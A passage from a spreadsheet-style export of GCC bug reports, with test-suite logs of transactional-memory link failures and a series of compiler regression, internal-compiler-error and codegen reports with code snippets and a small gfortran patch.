/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:12:15: warning: conflicting types for built-in function '_ITM_commitTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:13:15: warning: conflicting types for built-in function '_ITM_WU4' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_0.c:14:15: warning: conflicting types for built-in function '_ITM_WU8' [enabled by default]
FAIL: gcc.dg/lto/trans-mem-2 c_lto_trans-mem-2_0.o assemble -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto -fgnu-tm  -c  -o c_lto_trans-mem-2_1.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-2_1.c    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-2 c_lto_trans-mem-2_1.o assemble -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/ c_lto_trans-mem-2_0.o c_lto_trans-mem-2_1.o   -flto -fgnu-tm       -o gcc-dg-lto-trans-mem-2-01.exe    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-2 c_lto_trans-mem-2_0.o-c_lto_trans-mem-2_1.o link -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto  -c  -o c_lto_trans-mem-3_0.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_0.c    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-3 c_lto_trans-mem-3_0.o assemble -flto
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto -fgnu-tm -c  -o c_lto_trans-mem-3_1.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c    (timeout = 300)
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:14:19: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:15:15: warning: conflicting types for built-in function '_ITM_commitTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:16:15: warning: conflicting types for built-in function '_ITM_WU4' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:17:15: warning: conflicting types for built-in function '_ITM_WU8' [enabled by default]
output is:
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:14:19: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:15:15: warning: conflicting types for built-in function '_ITM_commitTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:16:15: warning: conflicting types for built-in function '_ITM_WU4' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-3_1.c:17:15: warning: conflicting types for built-in function '_ITM_WU8' [enabled by default]
FAIL: gcc.dg/lto/trans-mem-3 c_lto_trans-mem-3_1.o assemble -flto
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/ c_lto_trans-mem-3_0.o c_lto_trans-mem-3_1.o   -flto       -o gcc-dg-lto-trans-mem-3-01.exe    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-3 c_lto_trans-mem-3_0.o-c_lto_trans-mem-3_1.o link -flto
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto -fgnu-tm  -c  -o c_lto_trans-mem-4_0.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-4_0.c    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o assemble -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/   -flto -fgnu-tm  -c  -o c_lto_trans-mem-4_1.o /home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c    (timeout = 300)
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:8:10: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:12:6: warning: conflicting types for built-in function '__builtin__ITM_commitTransaction' [enabled by default]
output is:
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:8:10: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]
/home/regress/tbox/svn-gcc/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:12:6: warning: conflicting types for built-in function '__builtin__ITM_commitTransaction' [enabled by default]
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_1.o assemble -flto -fgnu-tm
Executing on host: /home/regress/tbox/native/build/gcc/xgcc -B/home/regress/tbox/native/build/gcc/ c_lto_trans-mem-4_0.o c_lto_trans-mem-4_1.o   -flto -fgnu-tm       -o gcc-dg-lto-trans-mem-4-01.exe    (timeout = 300)
c_lto_trans-mem-4_0.o: In function `main':
trans-mem-4_0.c:(.text+0x1b): undefined reference to `_ITM_commitTransaction'
collect2: error: ld returned 1 exit status
compiler exited with status 1
output is:
c_lto_trans-mem-4_0.o: In function `main':
trans-mem-4_0.c:(.text+0x1b): undefined reference to `_ITM_commitTransaction'
collect2: error: ld returned 1 exit status
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o link -flto -fgnu-tm
UNRESOLVED: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o execute -flto -fgnu-tm
On x86_64-apple-darwin10 gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o link -flto -fgnu-tm fails for both -m32 and -m64 with
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/   -flto -fgnu-tm  -c  -m32 -o c_lto_trans-mem-4_0.o /opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_0.c    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o assemble -flto -fgnu-tm
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/   -flto -fgnu-tm  -c  -m32 -o c_lto_trans-mem-4_1.o /opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c    (timeout = 300)
/opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:8:10: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]^M
/opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:12:6: warning: conflicting types for built-in function '__builtin__ITM_commitTransaction' [enabled by default]^M
output is:
/opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:8:10: warning: conflicting types for built-in function '_ITM_beginTransaction' [enabled by default]^M
/opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c:12:6: warning: conflicting types for built-in function '__builtin__ITM_commitTransaction' [enabled by default]^M
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_1.o assemble -flto -fgnu-tm
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/ c_lto_trans-mem-4_0.o c_lto_trans-mem-4_1.o   -flto -fgnu-tm       -m32 -o gcc-dg-lto-trans-mem-4-01.exe    (timeout = 300)
Undefined symbols:^M
  __ITM_commitTransaction referenced from:^M
      _main in c_lto_trans-mem-4_0.o^M
     (maybe you meant: ___builtin__ITM_commitTransaction)^M
  __ITM_registerTMCloneTable referenced from:^M
      ___doTMRegistrations in crttms.o^M
      __ITM_registerTMCloneTable$non_lazy_ptr in crttms.o^M
     (maybe you meant: __ITM_registerTMCloneTable$non_lazy_ptr)^M
  __ITM_deregisterTMCloneTable referenced from:^M
      ___doTMdeRegistrations in crttme.o^M
      __ITM_deregisterTMCloneTable$non_lazy_ptr in crttme.o^M
     (maybe you meant: __ITM_deregisterTMCloneTable$non_lazy_ptr)^M
ld: symbol(s) not found^M
collect2: error: ld returned 1 exit status^M
compiler exited with status 1
output is:
Undefined symbols:^M
  __ITM_commitTransaction referenced from:^M
      _main in c_lto_trans-mem-4_0.o^M
     (maybe you meant: ___builtin__ITM_commitTransaction)^M
  __ITM_registerTMCloneTable referenced from:^M
      ___doTMRegistrations in crttms.o^M
      __ITM_registerTMCloneTable$non_lazy_ptr in crttms.o^M
     (maybe you meant: __ITM_registerTMCloneTable$non_lazy_ptr)^M
  __ITM_deregisterTMCloneTable referenced from:^M
      ___doTMdeRegistrations in crttme.o^M
      __ITM_deregisterTMCloneTable$non_lazy_ptr in crttme.o^M
     (maybe you meant: __ITM_deregisterTMCloneTable$non_lazy_ptr)^M
ld: symbol(s) not found^M
collect2: error: ld returned 1 exit status^M
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o link -flto -fgnu-tm
UNRESOLVED: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o execute -flto -fgnu-tm
and
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/   -flto -fgnu-tm  -c  -m64 -o c_lto_trans-mem-4_0.o /opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_0.c    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o assemble -flto -fgnu-tm
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/   -flto -fgnu-tm  -c  -m64 -o c_lto_trans-mem-4_1.o /opt/gcc/work/gcc/testsuite/gcc.dg/lto/trans-mem-4_1.c    (timeout = 300)
PASS: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_1.o assemble -flto -fgnu-tm
Executing on host: /opt/gcc/build_w/gcc/xgcc -B/opt/gcc/build_w/gcc/ c_lto_trans-mem-4_0.o c_lto_trans-mem-4_1.o   -flto -fgnu-tm       -m64 -o gcc-dg-lto-trans-mem-4-01.exe    (timeout = 300)
Undefined symbols:^M
  __ITM_registerTMCloneTable referenced from:^M
      ___doTMRegistrations in crttms.o^M
      ___doTMRegistrations in crttms.o^M
  __ITM_deregisterTMCloneTable referenced from:^M
      ___doTMdeRegistrations in crttme.o^M
      ___doTMdeRegistrations in crttme.o^M
ld: symbol(s) not found^M
collect2: error: ld returned 1 exit status^M
compiler exited with status 1
output is:
Undefined symbols:^M
  __ITM_registerTMCloneTable referenced from:^M
      ___doTMRegistrations in crttms.o^M
      ___doTMRegistrations in crttms.o^M
  __ITM_deregisterTMCloneTable referenced from:^M
      ___doTMdeRegistrations in crttme.o^M
      ___doTMdeRegistrations in crttme.o^M
ld: symbol(s) not found^M
collect2: error: ld returned 1 exit status^M
FAIL: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o link -flto -fgnu-tm
UNRESOLVED: gcc.dg/lto/trans-mem-4 c_lto_trans-mem-4_0.o-c_lto_trans-mem-4_1.o execute -flto -fgnu-tm</t>
  </si>
  <si>
    <t>GCC-55249</t>
  </si>
  <si>
    <t>[4.6/4.7/4.8 Regression] Multiple copy constructors for template class lead to link errors</t>
  </si>
  <si>
    <t>Created attachment 28647
gcc -v -save-temps -std=c++0x -Wall -Wextra main.cpp 1&gt;output.txt 2&gt;&amp;1
Following code leads to linker errors in C++11 mode and in default mode (requires replacement of std::array with boost::array):
#include 
#include 
template 
struct inner_type {
    inner_type() {}
    inner_type(inner_type&amp; ) {}
    inner_type(const inner_type&amp; ) {}
    ~inner_type() {}
}
// Uncomment typedef to get undefined reference to 
// __uninitialized_copyILb0EE13__uninit_copy
// Can be workaround by marking inner_type copy constructors with noexcept
//typedef std::vector 3&gt; &gt; type
// Uncomment typedef to get undefined reference to 
// `inner_type::inner_type(inner_type const&amp;)'
//typedef std::array 3&gt; type
int main()
{
    type t1
    type t2 = t1
    return 0
}</t>
  </si>
  <si>
    <t>GCC-22077</t>
  </si>
  <si>
    <t>[4.0 Regression] vec_all_eq does not produce good result</t>
  </si>
  <si>
    <t>int foo(vector float x vector float y) {
        if (vec_all_eq(xy)) return 3245 
        else return 12
}
Right now we produce:
        vcmpeqfp. v3v2v3
        li r33245
        mfcr r0
        rlwinm r0r0251
        cmpwi cr7r00
        bnelr+ cr7
        li r312
        blr
But we should be able to produce something like the following:
        vcmpeqfp. v3v2v3
        cmpwi cr6r00
        li r33245
        bnelr+ cr7
        li r312
        blr
This might be because of there is no such thing as BI modes on powerpc but I don't know for sure.</t>
  </si>
  <si>
    <t>GCC-7709</t>
  </si>
  <si>
    <t>NullPointerException in _Jv_ResolvePoolEntry</t>
  </si>
  <si>
    <t xml:space="preserve">	In _Jv_ResolvePoolEntry if no method is found in the 
	JV_CONSTANT_Methodref/JV_CONSTANT_InterfaceMethodref case
	_Jv_DetermineVTableIndex may be called with found_class == NULL
	causing a NullPointerException when _Jv_DetermineVTableIndex
	calls getSuperclass().
Release:
3.3 20020820 (experimental)
Environment:
System: Linux churchill 2.4.3-12 #1 Fri Jun 8 15:05:56 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc/configure --prefix=/home/user/jmr/app/gcc --enable-langs=c++java --enable-shared --enable-threads=posix --with-as=/home/user/jmr/app/binutils/bin/as --with-ld=/home/user/jmr/app/binutils/bin/ld
How-To-Repeat:
	I haven't reduced it to a small test case yet but it is clear
	that some error other than NullPointerException should be reported.</t>
  </si>
  <si>
    <t>GCC-61450</t>
  </si>
  <si>
    <t>ICE in gfc_global_used()</t>
  </si>
  <si>
    <t>$ cat w.f90 
module p
  integer i1
  bind(cname=foo) :: i1
end module
subroutine truc() bind(cname=foo)
end
$ gfortran w.f90
w.f90:6.36:
subroutine truc() bind(cname=foo)
                                    1
Internal Error at (1):
gfc_global_used(): Bad type
I don't know exactly how this specific case arises but as it's only a diagnostics trying to be extra smart I suggest to give it a more decent fallback e.g.:
Index: parse.c
===================================================================
--- parse.c	(revision 211315)
+++ parse.c	(working copy)
@@ -431333 +431332 @@ gfc_global_used (gfc_gsymbol *sym locus
   switch(sym-&gt;type)
     {
     case GSYM_PROGRAM:
-      name = PROGRAM
+      name = as a PROGRAM 
       break
     case GSYM_FUNCTION:
-      name = FUNCTION
+      name = as a FUNCTION 
       break
     case GSYM_SUBROUTINE:
-      name = SUBROUTINE
+      name = as a SUBROUTINE 
       break
     case GSYM_COMMON:
-      name = COMMON
+      name = as a COMMON 
       break
     case GSYM_BLOCK_DATA:
-      name = BLOCK DATA
+      name = as a BLOCK DATA 
       break
     case GSYM_MODULE:
-      name = MODULE
+      name = as a MODULE 
       break
     default:
-      gfc_internal_error (gfc_global_used(): Bad type)
-      name = NULL
+      name = 
     }
   if (sym-&gt;binding_label)
-    gfc_error (Global binding name '%s' at %L is already being used as a %s 
+    gfc_error (Global binding name '%s' at %L is already being used %s
 	       at %L sym-&gt;binding_label where name 
   else
-    gfc_error (Global name '%s' at %L is already being used as a %s at %L
+    gfc_error (Global name '%s' at %L is already being used %sat %L
 	       sym-&gt;name where name 
 }</t>
  </si>
  <si>
    <t>GCC-79198</t>
  </si>
  <si>
    <t>[7 Regression] r244802 causes out of memory during PGO bootstrap</t>
  </si>
  <si>
    <t>Since r244802 I run out of memory when compiling bitmap.c
during stagefeedback (PGO bootstrap).
ipa_node_params_t::duplicate keeps allocating memory until the OOM killer kicks in.</t>
  </si>
  <si>
    <t>GCC-49400</t>
  </si>
  <si>
    <t>[F08] Proc-pointer declaration in BLOCK construct</t>
  </si>
  <si>
    <t>Follow up to PR 49397. The following code should be parsed correctly.
Currently one gets:
test.f90:8.8:
        Procedure(Real)Pointer :: p
        1
Error: Unclassifiable statement at (1)
(Regarding the validity cf. also PR 49397 and IR J3/11-198.)
  Program m5
    Call s
  Contains
    Subroutine s
      Print *g()
      block
        Procedure(Real)Pointer :: p
        p =&gt; g
        Print *p()
      end block
    End Subroutine
  End Program
  Function g()
    g = 2
  End Function</t>
  </si>
  <si>
    <t>GCC-37900</t>
  </si>
  <si>
    <t>[4.4 Regression] StringBuffer_1 failures</t>
  </si>
  <si>
    <t>On Linux/ia64 revision 141275 gave
+FAIL: StringBuffer_1 -O3 -findirect-dispatch execution - source compiled test
+FAIL: StringBuffer_1 -O3 execution - source compiled test
+FAIL: StringBuffer_1 -findirect-dispatch execution - source compiled test
+FAIL: StringBuffer_1 execution - source compiled test
Revision 141264 is OK.</t>
  </si>
  <si>
    <t>GCC-8089</t>
  </si>
  <si>
    <t>c++ code with syntax error causes internal compiler error segfault</t>
  </si>
  <si>
    <t>g++ generates an Internal Compiler Error and segfaults with the following program containing a syntax error:
class S {
  public:
    class SS {
      public:
        enum STATE_TYPE { INITIAL INTERMEDIATE FINAL }
    } /* class S:SS */
} /* class S */
int main(void)
{
  enum S::SS::STATE_TYPE state1
//The following line is a syntax error that generates an
//internal compiler error on gcc-2.95.3 and gcc-3.2
  enum S::SS state2
  return 0
}
Release:
3.2 and 2.95.3 and probably others
Environment:
System: Linux hpc003 2.4.19pre1 #4 SMP Fri Mar 1 09:30:24 CST 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../configure --prefix=/appl/gcc-3.2 --disable-shared --enable-threads --enable-version-specific-runtime-libs --with-included-gettext
Thread model: posix
gcc version 3.2
How-To-Repeat:
compile the attatched program using gcc-3.2 gcc-2.95.3 and probably others.</t>
  </si>
  <si>
    <t>GCC-67150</t>
  </si>
  <si>
    <t>[c++-concepts] Expression constraint fails with dependent types used as a deduction constraint target</t>
  </si>
  <si>
    <t>r226725 fails to compile this program:
#include 
template 
concept bool ExplicitlyConvertible =
  requires (From&amp;&amp; val) {
    requires std::is_same::value
    requires std::is_same::value
    requires std::is_same&lt;decltype(val)bool
    static_cast((bool // Line 9
    static_cast((From   // Line 10
  }
template 
concept bool Boolean =
  requires (const T&amp; t) {
    { t } -&gt; ExplicitlyConvertible
  }
constexpr bool f(Boolean) { return true } // Line 19
static_assert(f(true))                    // Line 20
with error:
~/concept-gcc-r226725/bin/g++ -std=gnu++1z foo.cpp -c
foo.cpp:20:21: error: cannot call function â€˜constexpr bool f(auto:1) [with auto:1 = bool]â€™
 static_assert(f(true))                    // Line 20
                     ^
foo.cpp:19:16: note:   constraints not satisfied
 constexpr bool f(Boolean) { return true } // Line 19
                ^
foo.cpp:19:16: note:   concept â€˜Booleanâ€™ was not satisfied
It does compile correctly if line 10 is commented out demonstrating that the expression static_cast((From&amp;&amp;)val) is causing the constraint dissatisfaction despite the fact that From is bool To is bool and static_cast((bool&amp;&amp;)val) is acceptable.</t>
  </si>
  <si>
    <t>GCC-1015</t>
  </si>
  <si>
    <t>Internal Compiler Error</t>
  </si>
  <si>
    <t>Internal compiler error when parens aren't balanced  on while loop.
Release:
unknown
Environment:
linux g++
How-To-Repeat:
compile the attachment using g++ -Wall</t>
  </si>
  <si>
    <t>GCC-24231</t>
  </si>
  <si>
    <t>[4.1 Regression] SSA corruption with C++ code and exceptions and loads</t>
  </si>
  <si>
    <t>/usr/lib/gcc/powerpc64-suse-linux/4.1.0/cc1plus -fpreprocessed AttributeListImpl.ii -quiet -dumpbase AttributeListImpl.cpp -auxbase-strip ../../obj/AttributeListImpl.o -O2 -Wall -Wall -version -fmessage-length=0 -fno-elide-constructors -fPIC -o AttributeListImpl.s
 Conflict tempVector$m_memoryManager_1215(ab) and tempVector$m_memoryManager_1153(ab) across an abnormal edge from BB39-&gt;BB42
/usr/src/packages/BUILD/xml-xalan/c/src/xalanc/PlatformSupport/AttributeListImpl.cpp: In member function â€˜xalanc_1_9::AttributeListImpl&amp; xalanc_1_9::AttributeListImpl::operator=(const xalanc_1_9::AttributeListImpl&amp;)â€™:
/usr/src/packages/BUILD/xml-xalan/c/src/xalanc/PlatformSupport/AttributeListImpl.cpp:102: internal compiler error: SSA corruption
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
#0  internal_error (gmsgid=0x10bbc18c SSA corruption) at diagnostic.c:534
#1  0x108e3140 in coalesce_abnormal_edges (map=0x10d41878 graph=0x10d41e48
    rv=0x10d222f8) at tree-outof-ssa.c:643
#2  0x108e4548 in coalesce_ssa_name (map=0x10d41878 flags=1)
    at tree-outof-ssa.c:912
#3  0x108e89d8 in remove_ssa_form (dump=0x0 map=0x10d41878 flags=1)
    at tree-outof-ssa.c:2402
#4  0x108e94c8 in rewrite_out_of_ssa () at tree-outof-ssa.c:2593
#5  0x10817060 in execute_one_pass (pass=0x10be3d80) at passes.c:827
(gdb) up 5
#5  0x10817060 in execute_one_pass (pass=0x10be3d80) at passes.c:827
827         pass-&gt;execute ()
(gdb) print *pass
$1 = {name = 0x10bbc7a4 optimized gate = 0
  execute = 0x108e93ac  sub = 0x0 next = 0x10be3e50
  static_pass_number = 97 tv_id = 69 properties_required = 732
  properties_provided = 668 properties_destroyed = 64 todo_flags_start = 28
  todo_flags_finish = 3 letter = 0 '\0'}</t>
  </si>
  <si>
    <t>GCC-29236</t>
  </si>
  <si>
    <t>[4.2 Regression] Bogus ambiguity with templates + friend</t>
  </si>
  <si>
    <t>The following code does not compile because class TestBad has both template in template argument T2 and friend operators.
template 
class Temp {}
template  class T2&gt;
class TestBad
{
public:
  template  class OtherT2&gt;
  friend bool operator == (const TestBad
  template  class OtherT2&gt;
  friend bool operator != (const TestBad
private:
  T2 vector
}
template  class OtherT2&gt;
bool operator == (const TestBad&amp; a const TestBad&amp; b)
{
  (void)a
  (void)b
  return true
}
template  class OtherT2&gt;
bool operator != (const TestBad&amp; a const TestBad&amp; b)
{
  (void)a
  (void)b
  return false
}
int main(int argc char* argv[])
{
  bool result
  TestBad a
  TestBad b
  result = (a == b)
  (void)a
  (void)b
  (void)result
  (void)argc
  (void)argv
  return 0
}
I've tried with gcc 3.4.4 in Mingw32 and it shows me the following error message:
test.cpp: In function `int main(int char**)':
test.cpp:43: error: ambiguous overload for 'operator==' i
n 'a == b'
test.cpp:23: note: candidates are: bool operator==(const
TestBad&amp; const TestBad&amp;) [with OtherT1 = in
t OtherT2 = Temp]
test.cpp:13: note:                 bool operator==(const
TestBad&amp; const TestBad&amp;) [with OtherT1 = in
t OtherT2 = Temp T1 = int T2 = Temp]
PS: With out template in template argument everything is fine!</t>
  </si>
  <si>
    <t>4ekucT</t>
  </si>
  <si>
    <t>GCC-17650</t>
  </si>
  <si>
    <t>[4.0 Regression] Module /usr/local/src/trunk/gcc/libobjc/Protocol.m version 0 doesn't match runtime 8</t>
  </si>
  <si>
    <t>AuroraFedora Core release 1.91 (Wombat FC2) UP UltraSparc IIi (Sabre) sun4u:
binutils-2.15.90.0.3-6
bison-1.875-7.1
dejagnu-1.4.2-11
expect-5.39.0-96.1
gcc-3.3.3-3
glibc-2.3.3-26sparc3.sparc
glibc-2.3.3-26sparc3.sparc64
glibc-kernheaders-2.6-14sparc
kernel-2.6.8-1.571sp1
tcl-8.4.5-6
zlib-1.2.1.1-2.1.sparc
zlib-1.2.1.1-2.1.sparc64
LAST_UPDATED: Tue Sep 21 09:26:04 UTC 2004
Native configuration is sparc64-unknown-linux-gnu
In http://gcc.gnu.org/ml/gcc-testresults/2004-09/msg01035.html I get
quite a few failures that all look similar for instance:
Running /usr/local/src/trunk/gcc/gcc/testsuite/objc/execute/execute.exp ...
Executing on host: /usr/local/src/trunk/objdir/gcc/xgcc
-B/usr/local/src/trunk/objdir/gcc/
/usr/local/src/trunk/gcc/gcc/testsuite/objc/execute/IMP.m  -w  -O0
-I/usr/local/src/trunk/gcc/gcc/testsuite/../../libobjc
-L/usr/local/src/trunk/objdir/sparc64-unknown-linux-gnu/libobjc/.libs  -lobjc
-lm   -o /usr/local/src/trunk/objdir/gcc/testsuite/IMP.x0    (timeout = 300)
PASS: objc/execute/IMP.m compilation  -O0
Module /usr/local/src/trunk/gcc/libobjc/Protocol.m version 0 doesn't match runtime 8
FAIL: objc/execute/IMP.m execution  -O0
Any ideas?
See also potentially thread at http://gcc.gnu.org/ml/gcc/2004-09/msg01412.html</t>
  </si>
  <si>
    <t>GCC-43080</t>
  </si>
  <si>
    <t>ICE with anonymous union and -flto</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE on trunk when compiled with
-flto -g:
=======================================
inline int foo()
{
  static union { int i }
  return i
}
void bar()
{
  foo()
}
=======================================
bug.cc: In function 'foo()':
bug.cc:5:1: internal compiler error: in gimple_decl_printable_name at gimple.c:4610
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-18664</t>
  </si>
  <si>
    <t>[4.0 Regression] ACATS ICE cxaa010 expected ssa_name have var_decl in verify_ssa at tree-ssa.c:660</t>
  </si>
  <si>
    <t>Present on both x86 and x86_64.
compiling cxaa010.adb
+===========================GNAT BUG DETECTED==============================+
| 4.0.0 20041122 (experimental) (i686-pc-linux-gnu) GCC error:             |
| tree check: expected ssa_name have var_decl in verify_ssa at           |
|    tree-ssa.c:660                                                        |</t>
  </si>
  <si>
    <t>GCC-35442</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 Regression] Completely broken diagnostic with view_convert_expr</t>
  </si>
  <si>
    <t>A broken diagnostic is issued for the following invalid code snippet
since GCC 4.0.2:
==================================================
typedef char A __attribute__((vector_size(8)))
typedef int  B __attribute__((vector_size(8)))
void foo(A a)
{
  ((B)a)()
}
==================================================
#'view_convert_expr' not supported by pp_c_expression#'bugD3.c: In function 'foo':
bug.c:6: error: called object  is not a function
bug.c:5: warning: MMX vector argument without MMX enabled changes the ABI
Similar to PR35441.</t>
  </si>
  <si>
    <t>GCC-1916</t>
  </si>
  <si>
    <t>internal compile error 980711</t>
  </si>
  <si>
    <t xml:space="preserve">
Release:
2.91.66</t>
  </si>
  <si>
    <t>gilles56</t>
  </si>
  <si>
    <t>GCC-45531</t>
  </si>
  <si>
    <t>-fcompare-debug failure with -fvar-tracking-uninit codegen differences</t>
  </si>
  <si>
    <t>Compiler output:
$ gcc -fvar-tracking-uninit -fcompare-debug testcase.c
testcase.c:1:0: warning: variable tracking requested but useless unless producing debug info [enabled by default]
gcc: error: testcase.c: -fcompare-debug failure (length)
The failure appears with -g as well but the warning isn't shown in that case.
Tested revisions:
r163636 - fail
r153685 - fail</t>
  </si>
  <si>
    <t>GCC-63410</t>
  </si>
  <si>
    <t>[Regression] pass_instances.def is not installed</t>
  </si>
  <si>
    <t>Created attachment 33614
Trivial patch to add pass-instances.def to installed headers
We install the header pass_manager.h but it can't be included by a plugin since it includes pass-instances.def and we don't current install that.
/home/david/coding/gcc-python/gcc-svn-4.9/install/lib/gcc/x86_64-unknown-linux-gnu/4.9.2/plugin/include/pass_manager.h:123:30: fatal error: pass-instances.def: No such file or directory
 #include pass-instances.def
Affects 4.9 branch (e.g. r215685) and I believe trunk.
Marking as [Regression] since this currently makes it impossible to access the roots of the pass tree (all_passes et al) from a plugin in 4.9+ since they were moved from being globals to being member data of the pass_manager in 4.9 hence we need to include pass_manager.h for that.
(My fault sorry: I was the one who moved these from being globals to being member data.  The gcc-python-plugin needs this and hence this is one thing blocking that plugin from being built against 4.9)
Am currently verifying the obvious patch.</t>
  </si>
  <si>
    <t>GCC-6869</t>
  </si>
  <si>
    <t>G++ 3.1 generates incorrect assembler instructions for HPPA 2.0</t>
  </si>
  <si>
    <t>g++ generates in static initialization code:
        addil LR%L$3244-$global$%r27
        ldw RR%L$3244-$global$(%r1)%r22
        ldil L%$$dyncall%r2
-       ble  R%$$dyncall(%sr4%r2)       &lt;- for PA1.1
+       bel  R%$$dyncall(%sr4%r2)      &lt;- for PA2.0
        copy %r31%r2
        ldw 12(%r3)%r19
GNU as complains about the bel lines with the following error message:
xxxx.s:197656: Error: Invalid Nullification: (l)
Release:
gcc-3.1 binutils-2.12.1
Environment:
hppa2.0-hp-hpux11.11
How-To-Repeat:
Unfortunately I couldn't create a small test file and the original file contains confidential information.</t>
  </si>
  <si>
    <t>stefan.becker</t>
  </si>
  <si>
    <t>GCC-30321</t>
  </si>
  <si>
    <t>program crash for SUM applied to zero-size array</t>
  </si>
  <si>
    <t>U:\vrao\fortran&gt;gfortran -v
Using built-in specs.
Target: i386-pc-mingw32
Configured with: ../trunk/configure --prefix=/mingw --enable-languages=cfortran --with-gmp=/home/coudert/local --disable-nls --with-ld=/mingw/bin/ld --with-as=/mingw/bin/as --disable-werror --enable-bootstrap --enable-threads --host=i386-pc-mingw32 --disable-shared --enable-libgomp
Thread model: win32
gcc version 4.3.0 20061021 (experimental)
U:\vrao\fortran&gt;type xzero_size_array.f90
program xzero
implicit none
integer :: ii(10)
ii = 1
print*sum(iidim=1) =sum(iidim=1)
end program xzero
U:\vrao\fortran&gt;gfortran xzero_size_array.f90
U:\vrao\fortran&gt;a.exe
program crashes (Windows pop-up: a.exe has encountered a problem and needs to close)</t>
  </si>
  <si>
    <t>GCC-62218</t>
  </si>
  <si>
    <t>gcc produces invalid SH instruction (stc r2sr) when building libgcc</t>
  </si>
  <si>
